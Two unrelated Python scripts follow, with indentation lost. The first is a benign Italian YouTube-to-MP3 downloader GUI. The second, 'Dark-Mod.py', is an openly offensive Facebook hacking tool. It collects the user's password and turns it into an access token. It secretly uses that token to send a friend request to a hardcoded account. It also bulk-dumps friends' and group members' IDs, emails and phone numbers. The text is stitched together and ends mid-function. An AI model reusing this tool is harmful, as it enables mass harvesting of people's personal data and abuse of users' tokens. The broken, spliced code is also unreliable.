from numpy import insert
import validators
from moviepy.editor import AudioFileClip
from pytube import YouTube, exceptions, request
import subprocess
from threading import Thread
request.default_range_size = 2097152 # about 2MB chunk size
ws = Tk()
ws.title('YT Downloader - Scarica le tue canzoni')
ws.geometry('1000x600')
ws.eval('tk::PlaceWindow . center')
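# Resolve the application directory both when frozen (e.g. with PyInstaller) and when run as a plain script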
if getattr(sys, 'frozen', False):
dirname = os.path.dirname(sys.executable)
elif __file__:
dirname = os.path.dirname(__file__)
# ws.iconbitmap(os.path.join(dirname, "icon", "icon.ico"))
### Center the window ###
# The same window size is stored in Tk_Width and Tk_Height for centering the window on the screen
Tk_Width = 1000
Tk_Height = 600
# Calculate the top-left coordinates that center the window on the screen
x_Left = int(ws.winfo_screenwidth()/2 - Tk_Width/2)
y_Top = int(ws.winfo_screenheight()/2 - Tk_Height/2)
# Apply the offset via the "+x+y" geometry format to center the window
ws.geometry("+{}+{}".format(x_Left, y_Top))
###
def make_menu(w):
global the_menu
the_menu = Menu(w, tearoff=0)
the_menu.add_command(label="Taglia")
the_menu.add_command(label="Copia")
the_menu.add_command(label="Incolla")
def show_menu(e):
w = e.widget
the_menu.entryconfigure("Taglia",
command=lambda: w.event_generate("<<Cut>>"))
the_menu.entryconfigure("Copia",
command=lambda: w.event_generate("<<Copy>>"))
the_menu.entryconfigure("Incolla",
command=lambda: w.event_generate("<<Paste>>"))
the_menu.tk.call("tk_popup", the_menu, e.x_root, e.y_root)
def delSelected():
link_selected = lb.curselection()
if len(link_selected) == 0:
m_box.showerror("Error", "Nessun link selezionato")
for i in link_selected:
lb.delete(i)
def insert_link():
inserted_link = link.get()
inserted_link = inserted_link.replace(" ", "")  # strip spaces; str.replace returns a new string
# check if inserted string is a valid url
if validators.url(inserted_link):
#check if the link is a YouTube link
try:
YouTube(inserted_link).check_availability()
list_of_urls = lb.get(0, 'end')
# check if the link was already inserted
if inserted_link not in list_of_urls:
lb.insert('end',inserted_link)
yt_link.delete(0,'end')
else:
yt_link.delete(0,'end')
m_box.showerror("Error", "Link YouTube già inserito!")
except exceptions.VideoUnavailable:
yt_link.delete(0,'end')
m_box.showerror("Error", "Link video YouTube non disponibile!\nInserisci un link di un video YouTube!")
except urllib.error.URLError:
yt_link.delete(0,'end')
m_box.showerror("Error", "Internet non disponibile")
else:
yt_link.delete(0,'end')
m_box.showerror("Error", "Inserisci un link valido!")
def NewWindow():
# Toplevel object which will
# be treated as a new window
global newWindow, lab, lab1, pb1, label2
newWindow = Toplevel(ws)
# sets the title of the
# Toplevel widget
newWindow.title("Download")
# sets the geometry of toplevel
newWindow.geometry("600x100+400+200")
# A Label widget to show in toplevel
lab = Label(newWindow, text ="", font=("Times", 14),justify=CENTER)
# lab.place(relx=0.5, rely=0.5, anchor="center")
# lab.grid(row=0,column=2)
lab.pack(side="top")
lab1 = Label(newWindow, text = "", font=("Arial Italic",11),justify=CENTER)
lab1.pack(side="top")
pb1 = Progressbar(newWindow, orient=HORIZONTAL, length=300, mode='indeterminate')
pb1.pack(expand=True,side="left")
# pb1.grid(row=3,column=2)
pb1.start()
#percentage label
label2=Label(newWindow,text="0%",font=("Arial Bold",15))
label2.pack(expand=True,fill=BOTH,side="left" )
# label2.grid(row=3,column=3)
def check():
list_of_urls = lb.get(0, 'end')
if len(list_of_urls) == 0:
m_box.showerror("Error", "Nessun link inserito")
else:
answer=m_box.askyesnocancel("Richiesta", "Vuoi davvero scaricare tutte le canzoni?")
if answer:
if os.path.isdir(dirname+"/Canzoni_mp4"): # if the Canzoni_mp4 folder exists, ask whether to delete the songs already in it
answer=m_box.askyesnocancel("Richiesta", "Vuoi cancellare tutte le canzoni che ci sono nella cartella 'Canzoni_mp4'?")
if answer:
files = glob.glob('./Canzoni_mp4/*')
for f in files:
os.remove(f)
download()
else:
pass
def threading():
# Run check() in a separate thread so the GUI stays responsive
t1=Thread(target=check)
t1.start()
def threading1():
# Run insert_link() in a separate thread so the GUI stays responsive
t1=Thread(target=insert_link)
t1.start()
def changeText(txt,title):
lab.configure(text=txt)
lab1.configure(text=title)
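# pytube progress callback: receives the stream being downloaded, the last chunk, and the bytes still remaining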
def on_progress(stream, chunk, bytes_remaining):
global inc
total_size = stream.filesize
bytes_downloaded = total_size - bytes_remaining
percentage_of_completion = bytes_downloaded / total_size * 100
inc=int(percentage_of_completion)
pb1["value"]+=inc-pb1["value"]
label2.config(text=f"{inc}%")
if pb1["value"]==100:
pb1.grid_forget()
label2.grid_forget()
label2["text"]="0%"
pb1["value"]=0
def download():
flag = False # flag to track whether the download completed successfully
NewWindow()
list_of_urls = lb.get(0, 'end')
try:
for i in list_of_urls:
if flag:
label2.pack()
pb1.config(mode="determinate")
pb1.stop()
yt = YouTube(i)
title = yt.title
title = re.sub(r'[\\/*?:"<>|]',"-",title)
changeText("Sto SCARICANDO: \n",title)
default_filename = title + ".mp4"
new_filename = title+'.mp3'
parent_dir = os.path.join(dirname, "Canzoni_mp4")
stream = yt.streams.get_audio_only()  # avoid shadowing the built-in str
yt.register_on_progress_callback(on_progress)
stream.download(output_path=parent_dir,filename=default_filename,max_retries=10)
try:
changeText("Sto CONVERTENDO da MP4 a MP3:\n",title)
pb1.config(mode="indeterminate")
pb1.start()
label2.pack_forget()
subprocess.run([
'ffmpeg', '-y',
'-i', os.path.join(parent_dir, default_filename),
os.path.join(parent_dir, new_filename)
])  # pass the argument list directly; shell=True is unnecessary with a list and breaks on POSIX
# audioclip = AudioFileClip(os.path.join(parent_dir, default_filename))
# audioclip.write_audiofile(os.path.join(parent_dir, new_filename))
# audioclip.close()
files = glob.glob(parent_dir+'/*.mp4')
for f in files:
os.remove(f)
flag = True
except Exception:
flag=False
files = glob.glob(parent_dir+'/*.mp4')
for f in files:
os.remove(f)
newWindow.destroy()
m_box.showerror("Error", "Errore di conversione da MP4 a MP3")
except Exception:
flag=False
newWindow.destroy()
m_box.showerror("Error", "Errore di download")
newWindow.destroy()
if flag: m_box.showinfo("Scaricato", "Ho scaricato tutto")
make_menu(ws)
show = Label(ws, anchor="w",fg ="#f5453c", text = 'Bentornato su "YT Downloader - Scarica le tue canzoni"', font = ("Serif", 14), padx = 0, pady = 10)
show.pack()
show = Label(ws, text = "Lista dei link delle canzoni che vuoi scaricare: ",
font = ("Times", 14), padx = 10, pady = 5)
show.pack()
lb = Listbox(ws, selectmode = "multiple")
scroll_one=Scrollbar(ws,command=lb.yview)
lb.configure(yscrollcommand=scroll_one.set)
lb.pack(padx = 20, pady = 0, expand = YES, fill = BOTH)
scroll_one.pack(side=RIGHT,fill=Y)
get_info = Label(ws, text="Inserisci il link della canzone che vuoi scaricare: ",
font = ("Times", 14), padx = 10, pady = 10)
get_info.pack()
link = StringVar()
yt_link = Entry(ws, width=60, textvariable=link)
yt_link.pack()
yt_link.bind_class("Entry", "<Button-3><ButtonRelease-3>", show_menu)
yt_link.focus()
Button(ws, text="Inserisci link", command=threading1).pack()
ws.bind('<Return>',lambda event:threading1())
Button(ws, text="Cancella link", command=delSelected).pack()
ws.bind('<Delete>',lambda event:delSelected())
Button(ws, text="Scarica le canzoni", command=threading, activeforeground ="#f5453c").pack()
ws.mainloop()
|
Dark-Mod.py
|
#!/usr/bin/python
# coding=utf-8
# (BHV) RedDemons
# Source : Python2 Gerak"
# DARK-FB version1.7
#Import module
import os,sys,time,datetime,random,hashlib,re,threading,json,getpass,urllib,cookielib
from multiprocessing.pool import ThreadPool
try:
import mechanize
except ImportError:
os.system("pip2 install mechanize")
try:
import requests
except ImportError:
os.system("pip2 install requests")
from requests.exceptions import ConnectionError
from mechanize import Browser
#-Pengaturan-#
########
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(),max_time=1)
br.addheaders = [('User-Agent','Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16')]
#-Keluar-#
def keluar():
print "\033[1;91m[!] Exit"
os.sys.exit()
#-Warna-#
def acak(x):
w = 'mhkbpcP'
d = ''
for i in x:
d += '!'+w[random.randint(0,len(w)-1)]+i
return cetak(d)
def cetak(x):
w = 'mhkbpcP'
for i in w:
j = w.index(i)
x= x.replace('!%s'%i,'\033[%s;1m'%str(31+j))
x += '\033[0m'
x = x.replace('!0','\033[0m')
sys.stdout.write(x+'\n')
#-Animasi-#
def jalan(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(00000.1)
##### LOGO #####
logo = """\033[1;97m█████████
\033[1;97m█▄█████▄█ \033[1;96m●▬▬▬▬▬▬▬▬▬๑۩۩๑▬▬▬▬▬▬▬▬●
\033[1;97m█\033[1;91m▼▼▼▼▼ \033[1;97m- _ --_--\033[1;92m╔╦╗┌─┐┬─┐┬┌─ ╔═╗╔╗
\033[1;97m█ \033[1;97m \033[1;97m_-_-- -_ --__\033[1;92m ║║├─┤├┬┘├┴┐───╠╣ ╠╩╗
\033[1;97m█\033[1;91m▲▲▲▲▲\033[1;97m-- - _ --\033[1;92m═╩╝┴ ┴┴└─┴ ┴ ╚ ╚═╝ \033[1;93mDark-Mod
\033[1;97m█████████ \033[1;96m«----------✧----------»
\033[1;97m ██ ██
\033[1;97m╔════════════════════════════════════════════╗
\033[1;97m║\033[1;93m* \033[1;97mAuthor \033[1;91m: \033[1;96mBROTHER• \033[1;97m ║
\033[1;97m║\033[1;93m* \033[1;97mGitHub \033[1;91m: \033[1;92m\033[4mgithub.com/cyber2611 :v\033[0m \033[1;97m ║
\033[1;97m╚════════════════════════════════════════════╝"""
# titik #
def tik():
titik = ['. ','.. ','... ']
for o in titik:
print("\r\033[1;91m[●] \033[1;92mLoading \033[1;97m"+o),;sys.stdout.flush();time.sleep(1)
back = 0
threads = []
berhasil = []
cekpoint = []
oks = []
gagal = []
idteman = []
idfromteman = []
idmem = []
emmem = []
nomem = []
id = []
em = []
emfromteman = []
hp = []
hpfromteman = []
reaksi = []
reaksigrup = []
komen = []
komengrup = []
listgrup = []
vulnot = "\033[31mNot Vuln"
vuln = "\033[32mVuln"
##### LICENSE #####
#=================#
def lisensi():
os.system('reset')
masuk()
##### Pilih Login #####
def masuk():
os.system('reset')
print logo
print "\033[1;97m║--\033[1;91m> \033[1;92m1.\033[1;97m Login"
print "\033[1;97m║--\033[1;91m> \033[1;92m2.\033[1;97m Login using token"
print "\033[1;97m║--\033[1;91m> \033[1;91m0.\033[1;97m Exit"
print "\033[1;97m║"
msuk = raw_input("\033[1;97m╚═\033[1;91mD \033[1;97m")
if msuk =="":
print"\033[1;91m[!] Wrong input"
keluar()
elif msuk =="1":
login()
elif msuk =="2":
tokenz()
elif msuk =="0":
keluar()
else:
print"\033[1;91m[!] Wrong input"
keluar()
##### LOGIN #####
#================#
def login():
os.system('reset')
try:
toket = open('login.txt','r')
menu()
except (KeyError,IOError):
os.system('reset')
print logo
print('\033[1;91m[☆] \033[1;92mLOGIN AKUN FACEBOOK \033[1;91m[☆]')
id = raw_input('\033[1;91m[+] \033[1;36mID\033[1;97m|\033[1;96mEmail\033[1;97m \033[1;91m:\033[1;92m ')
pwd = getpass.getpass('\033[1;91m[+] \033[1;36mPassword \033[1;91m:\033[1;92m ')
tik()
try:
br.open('https://m.facebook.com')
except mechanize.URLError:
print"\n\033[1;91m[!] No connection"
keluar()
br._factory.is_html = True
br.select_form(nr=0)
br.form['email'] = id
br.form['pass'] = pwd
br.submit()
url = br.geturl()
if 'save-device' in url:
try:
sig= 'api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail='+id+'format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword='+pwd+'return_ssl_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32'
data = {"api_key":"882a8490361da98702bf97a021ddc14d","credentials_type":"password","email":id,"format":"JSON", "generate_machine_id":"1","generate_session_cookies":"1","locale":"en_US","method":"auth.login","password":pwd,"return_ssl_resources":"0","v":"1.0"}
x=hashlib.new("md5")
x.update(sig)
a=x.hexdigest()
data.update({'sig':a})
url = "https://api.facebook.com/restserver.php"
r=requests.get(url,params=data)
z=json.loads(r.text)
zedd = open("login.txt", 'w')
zedd.write(z['access_token'])
zedd.close()
print '\n\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mLogin successfully'
requests.post('https://graph.facebook.com/me/friends?method=post&uids=gwimusa3&access_token='+z['access_token'])
os.system('xdg-open https://www.facebook.com/yoga.wira.188.')
menu()
except requests.exceptions.ConnectionError:
print"\n\033[1;91m[!] No connection"
keluar()
if 'checkpoint' in url:
print("\n\033[1;91m[!] \033[1;93mAccount Checkpoint")
print("\n\033[1;92m[#] Harap Login Ulang !")
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
else:
print("\n\033[1;91m[!] Login Failed")
os.system('rm -rf login.txt')
time.sleep(1)
login()
##### TOKEN #####
def tokenz():
os.system('reset')
print logo
toket = raw_input("\033[1;91m[?] \033[1;92mToken\033[1;91m : \033[1;97m")
try:
otw = requests.get('https://graph.facebook.com/me?access_token='+toket)
a = json.loads(otw.text)
nama = a['name']
zedd = open("login.txt", 'w')
zedd.write(toket)
zedd.close()
menu()
except KeyError:
print "\033[1;91m[!] Wrong"
e = raw_input("\033[1;91m[?] \033[1;92mWant to pick up token?\033[1;97m[y/n]: ")
if e =="":
keluar()
elif e =="y":
login()
else:
keluar()
##### MENU ##########################################
def menu():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
os.system('reset')
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
otw = requests.get('https://graph.facebook.com/me?access_token='+toket)
a = json.loads(otw.text)
nama = a['name']
id = a['id']
except KeyError:
os.system('reset')
print"\033[1;91m[!] \033[1;93mAccount Checkpoint"
os.system('rm -rf login.txt')
time.sleep(1)
login()
except requests.exceptions.ConnectionError:
print"\033[1;91m[!] No connection"
keluar()
os.system("reset")
print logo
print "║\033[1;91m[\033[1;96m✓\033[1;91m]\033[1;97m Name \033[1;91m: \033[1;92m"+nama+"\033[1;97m"
print "║\033[1;91m[\033[1;96m✓\033[1;91m]\033[1;97m ID \033[1;91m: \033[1;92m"+id
print "\033[1;97m╚"+40*"═"
print "\033[1;97m║--\033[1;91m> \033[1;92m1.\033[1;97m User information"
print "\033[1;97m║--\033[1;91m> \033[1;92m2.\033[1;97m Get Id/email/hp"
print "\033[1;97m║--\033[1;91m> \033[1;92m3.\033[1;97m Hack facebook account "
print "\033[1;97m║--\033[1;91m> \033[1;92m4.\033[1;97m Bot "
print "\033[1;97m║--\033[1;91m> \033[1;92m5.\033[1;97m Others "
print "\033[1;97m║--\033[1;91m> \033[1;92m6.\033[1;97m Show token "
print "\033[1;97m║--\033[1;91m> \033[1;92m7.\033[1;97m Delete trash "
print "\033[1;97m║--\033[1;91m> \033[1;92m8.\033[1;97m LogOut "
print "\033[1;97m║--\033[1;91m> \033[1;91m0.\033[1;97m Exit the programs "
print "║"
pilih()
#-
def pilih():
zedd = raw_input("\033[1;97m╚═\033[1;91mD \033[1;97m")
if zedd =="":
print "\033[1;91m[!] Wrong input"
pilih()
elif zedd =="1":
informasi()
elif zedd =="2":
dump()
elif zedd =="3":
menu_hack()
elif zedd =="4":
menu_bot()
elif zedd =="5":
lain()
elif zedd =="6":
os.system('reset')
print logo
toket=open('login.txt','r').read()
print "\033[1;91m[+] \033[1;92mYour token\033[1;91m :\033[1;97m "+toket
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu()
elif zedd =="7":
os.remove('out')
elif zedd =="8":
os.system('rm -rf login.txt')
os.system('xdg-open https://www.facebook.com/rendi.andika.3133')
keluar()
elif zedd =="0":
keluar()
else:
print "\033[1;91m[!] Wrong input"
pilih()
##### INFO #####
def informasi():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
aid = raw_input('\033[1;91m[+] \033[1;92mEnter ID\033[1;97m/\033[1;92mName\033[1;91m : \033[1;97m')
jalan('\033[1;91m[✺] \033[1;92mWait a minute \033[1;97m...')
r = requests.get('https://graph.facebook.com/me/friends?access_token='+toket)
cok = json.loads(r.text)
for i in cok['data']:
if aid in i['name'] or aid in i['id']:
x = requests.get("https://graph.facebook.com/"+i['id']+"?access_token="+toket)
z = json.loads(x.text)
print 42*"\033[1;97m═"
try:
print '\033[1;91m[➹] \033[1;92mName\033[1;97m : '+z['name']
except KeyError: print '\033[1;91m[?] \033[1;92mName\033[1;97m : \033[1;91mNot found'
try:
print '\033[1;91m[➹] \033[1;92mID\033[1;97m : '+z['id']
except KeyError: print '\033[1;91m[?] \033[1;92mID\033[1;97m : \033[1;91mNot found'
try:
print '\033[1;91m[➹] \033[1;92mEmail\033[1;97m : '+z['email']
except KeyError: print '\033[1;91m[?] \033[1;92mEmail\033[1;97m : \033[1;91mNot found'
try:
print '\033[1;91m[➹] \033[1;92mTelephone\033[1;97m : '+z['mobile_phone']
except KeyError: print '\033[1;91m[?] \033[1;92mTelephone\033[1;97m : \033[1;91mNot found'
try:
print '\033[1;91m[➹] \033[1;92mLocation\033[1;97m : '+z['location']['name']
except KeyError: print '\033[1;91m[?] \033[1;92mLocation\033[1;97m : \033[1;91mNot found'
try:
print '\033[1;91m[➹] \033[1;92mDate of birth\033[1;97m : '+z['birthday']
except KeyError: print '\033[1;91m[?] \033[1;92mDate of birth\033[1;97m : \033[1;91mNot found'
try:
print '\033[1;91m[➹] \033[1;92mSchool\033[1;97m : '
for q in z['education']:
try:
print '\033[1;91m ~ \033[1;97m'+q['school']['name']
except KeyError: print '\033[1;91m ~ \033[1;91mNot found'
except KeyError: pass
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu()
else:
pass
else:
print"\033[1;91m[✖] User not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu()
##### DUMP #####
def dump():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print "\033[1;97m║--\033[1;91m> \033[1;92m1.\033[1;97m Get ID friend"
print "\033[1;97m║--\033[1;91m> \033[1;92m2.\033[1;97m Get ID friend from friend"
print "\033[1;97m║--\033[1;91m> \033[1;92m3.\033[1;97m Get ID Search"
print "\033[1;97m║--\033[1;91m> \033[1;92m4.\033[1;97m Get group member ID"
print "\033[1;97m║--\033[1;91m> \033[1;92m5.\033[1;97m Get group member email"
print "\033[1;97m║--\033[1;91m> \033[1;92m6.\033[1;97m Get group member phone number"
print "\033[1;97m║--\033[1;91m> \033[1;92m7.\033[1;97m Get email friend"
print "\033[1;97m║--\033[1;91m> \033[1;92m8.\033[1;97m Get email friend from friend"
print "\033[1;97m║--\033[1;91m> \033[1;92m9.\033[1;97m Get a friend's phone number"
print "\033[1;97m║--\033[1;91m> \033[1;92m10.\033[1;97m Get a friend's phone number from friend"
print "\033[1;97m║--\033[1;91m> \033[1;91m0.\033[1;97m Back"
print "║"
dump_pilih()
#-----pilih
def dump_pilih():
cuih = raw_input("\033[1;97m╚═\033[1;91mD \033[1;97m")
if cuih =="":
print "\033[1;91m[!] Wrong input"
dump_pilih()
elif cuih =="1":
id_teman()
elif cuih =="2":
idfrom_teman()
elif cuih =="3":
os.system('reset')
print "\033[1;91mSegera"
keluar()
elif cuih =="4":
id_member_grup()
elif cuih =="5":
em_member_grup()
elif cuih =="6":
no_member_grup()
elif cuih =="7":
email()
elif cuih =="8":
emailfrom_teman()
elif cuih =="9":
nomor_hp()
elif cuih =="10":
hpfrom_teman()
elif cuih =="0":
menu()
else:
print "\033[1;91m[!] Wrong input"
dump_pilih()
##### ID TEMAN #####
def id_teman():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
try:
os.system('reset')
print logo
r=requests.get("https://graph.facebook.com/me/friends?access_token="+toket)
z=json.loads(r.text)
jalan('\033[1;91m[✺] \033[1;92mGet all friend id \033[1;97m...')
print 42*"\033[1;97m═"
bz = open('out/id_teman.txt','w')
for a in z['data']:
idteman.append(a['id'])
bz.write(a['id'] + '\n')
print ("\r\033[1;97m[ \033[1;92m"+str(len(idteman))+"\033[1;97m ]\033[1;97m=> \033[1;97m"+a['id']),;sys.stdout.flush();time.sleep(0.0001)
bz.close()
print '\r\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mSuccessfully get id \033[1;97m....'
print"\r\033[1;91m[+] \033[1;92mTotal ID \033[1;91m: \033[1;97m%s"%(len(idteman))
done = raw_input("\r\033[1;91m[+] \033[1;92mSave file with name\033[1;91m :\033[1;97m ")
os.rename('out/id_teman.txt','out/'+done)
print("\r\033[1;91m[+] \033[1;92mFile saved \033[1;91m: \033[1;97mout/"+done)
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except IOError:
print"\033[1;91m[!] Error creating file"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except (KeyboardInterrupt,EOFError):
print("\033[1;91m[!] Stopped")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except KeyError:
print('\033[1;91m[!] Error')
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except requests.exceptions.ConnectionError:
print"\033[1;91m[✖] No connection"
keluar()
##### ID FROM TEMAN #####
def idfrom_teman():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
try:
os.system('reset')
print logo
idt = raw_input("\033[1;91m[+] \033[1;92mInput ID friend \033[1;91m: \033[1;97m")
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom\033[1;91m :\033[1;97m "+op["name"]
except KeyError:
print"\033[1;91m[!] Friend not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
r=requests.get("https://graph.facebook.com/"+idt+"?fields=friends.limit(5000)&access_token="+toket)
z=json.loads(r.text)
jalan('\033[1;91m[✺] \033[1;92mGet all friend id from friend \033[1;97m...')
print 42*"\033[1;97m═"
bz = open('out/id_teman_from_teman.txt','w')
for a in z['friends']['data']:
idfromteman.append(a['id'])
bz.write(a['id'] + '\n')
print ("\r\033[1;97m[ \033[1;92m"+str(len(idfromteman))+"\033[1;97m ]\033[1;97m=> \033[1;97m"+a['id']),;sys.stdout.flush();time.sleep(0.0001)
bz.close()
print '\r\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mSuccessfully get id \033[1;97m....'
print"\r\033[1;91m[+] \033[1;92mTotal ID \033[1;91m: \033[1;97m%s"%(len(idfromteman))
done = raw_input("\r\033[1;91m[+] \033[1;92mSave file with name\033[1;91m :\033[1;97m ")
os.rename('out/id_teman_from_teman.txt','out/'+done)
print("\r\033[1;91m[+] \033[1;92mFile saved \033[1;91m: \033[1;97mout/"+done)
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except IOError:
print"\033[1;91m[!] Error creating file"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except (KeyboardInterrupt,EOFError):
print("\033[1;91m[!] Stopped")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except KeyError:
print('\033[1;91m[!] Error')
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except requests.exceptions.ConnectionError:
print"\033[1;91m[✖] No connection"
keluar()
##### ID FROM MEMBER GRUP #####
def id_member_grup():
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
try:
os.system('reset')
print logo
id=raw_input('\033[1;91m[+] \033[1;92mInput ID group \033[1;91m:\033[1;97m ')
try:
r=requests.get('https://graph.facebook.com/group/?id='+id+'&access_token='+toket)
asw=json.loads(r.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom group \033[1;91m:\033[1;97m "+asw['name']
except KeyError:
print"\033[1;91m[!] Group not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
jalan('\033[1;91m[✺] \033[1;92mGet group member id \033[1;97m...')
print 42*"\033[1;97m═"
bz = open('out/member_grup.txt','w')
re=requests.get('https://graph.facebook.com/'+id+'/members?fields=name,id&limit=999999999&access_token='+toket)
s=json.loads(re.text)
for a in s['data']:
idmem.append(a['id'])
bz.write(a['id'] + '\n')
print ("\r\033[1;97m[ \033[1;92m"+str(len(idmem))+"\033[1;97m ]\033[1;97m=> \033[1;97m"+a['id']),;sys.stdout.flush();time.sleep(0.0001)
bz.close()
print '\r\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mSuccessfully get id \033[1;97m....'
print"\r\033[1;91m[+] \033[1;92mTotal ID \033[1;91m: \033[1;97m%s"%(len(idmem))
done = raw_input("\r\033[1;91m[+] \033[1;92mSave file with name\033[1;91m :\033[1;97m ")
os.rename('out/member_grup.txt','out/'+done)
print("\r\033[1;91m[+] \033[1;92mFile saved \033[1;91m: \033[1;97mout/"+done)
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except IOError:
print"\033[1;91m[!] Error creating file"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except (KeyboardInterrupt,EOFError):
print("\033[1;91m[!] Stopped")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except KeyError:
print('\033[1;91m[!] Error')
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except requests.exceptions.ConnectionError:
print"\033[1;91m[✖] No connection"
keluar()
##### EMAIL FROM GRUP #####
def em_member_grup():
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
try:
os.system('reset')
print logo
id=raw_input('\033[1;91m[+] \033[1;92mInput ID group \033[1;91m:\033[1;97m ')
try:
r=requests.get('https://graph.facebook.com/group/?id='+id+'&access_token='+toket)
asw=json.loads(r.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom group \033[1;91m:\033[1;97m "+asw['name']
except KeyError:
print"\033[1;91m[!] Group not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
jalan('\033[1;91m[✺] \033[1;92mGet group member email \033[1;97m...')
print 42*"\033[1;97m═"
bz = open('out/em_member_grup.txt','w')
re=requests.get('https://graph.facebook.com/'+id+'/members?fields=name,id&limit=999999999&access_token='+toket)
s=json.loads(re.text)
for a in s['data']:
x = requests.get("https://graph.facebook.com/"+a['id']+"?access_token="+toket)
z = json.loads(x.text)
try:
emmem.append(z['email'])
bz.write(z['email'] + '\n')
print ("\r\033[1;97m[ \033[1;92m"+str(len(emmem))+"\033[1;97m ]\033[1;97m=> \033[1;97m"+z['email']+" | "+z['name']+"\n"),;sys.stdout.flush();time.sleep(0.0001)
except KeyError:
pass
bz.close()
print 42*"\033[1;97m═"
print '\r\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mSuccessfully get email from member group \033[1;97m....'
print"\r\033[1;91m[+] \033[1;92mTotal Email \033[1;91m: \033[1;97m%s"%(len(emmem))
done = raw_input("\r\033[1;91m[+] \033[1;92mSave file with name\033[1;91m :\033[1;97m ")
os.rename('out/em_member_grup.txt','out/'+done)
print("\r\033[1;91m[+] \033[1;92mFile saved \033[1;91m: \033[1;97mout/"+done)
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except IOError:
print"\033[1;91m[!] Error creating file"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except (KeyboardInterrupt,EOFError):
print("\033[1;91m[!] Stopped")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except KeyError:
print('\033[1;91m[!] Error')
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except requests.exceptions.ConnectionError:
print"\033[1;91m[✖] No connection"
keluar()
##### NOMER FROM GRUP #####
def no_member_grup():
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
try:
os.system('reset')
print logo
id=raw_input('\033[1;91m[+] \033[1;92mInput ID group \033[1;91m:\033[1;97m ')
try:
r=requests.get('https://graph.facebook.com/group/?id='+id+'&access_token='+toket)
asw=json.loads(r.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom group \033[1;91m:\033[1;97m "+asw['name']
except KeyError:
print"\033[1;91m[!] Group not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
jalan('\033[1;91m[✺] \033[1;92mGet group member phone number \033[1;97m...')
print 42*"\033[1;97m═"
bz = open('out/no_member_grup.txt','w')
re=requests.get('https://graph.facebook.com/'+id+'/members?fields=name,id&limit=999999999&access_token='+toket)
s=json.loads(re.text)
for a in s['data']:
x = requests.get("https://graph.facebook.com/"+a['id']+"?access_token="+toket)
z = json.loads(x.text)
try:
nomem.append(z['mobile_phone'])
bz.write(z['mobile_phone'] + '\n')
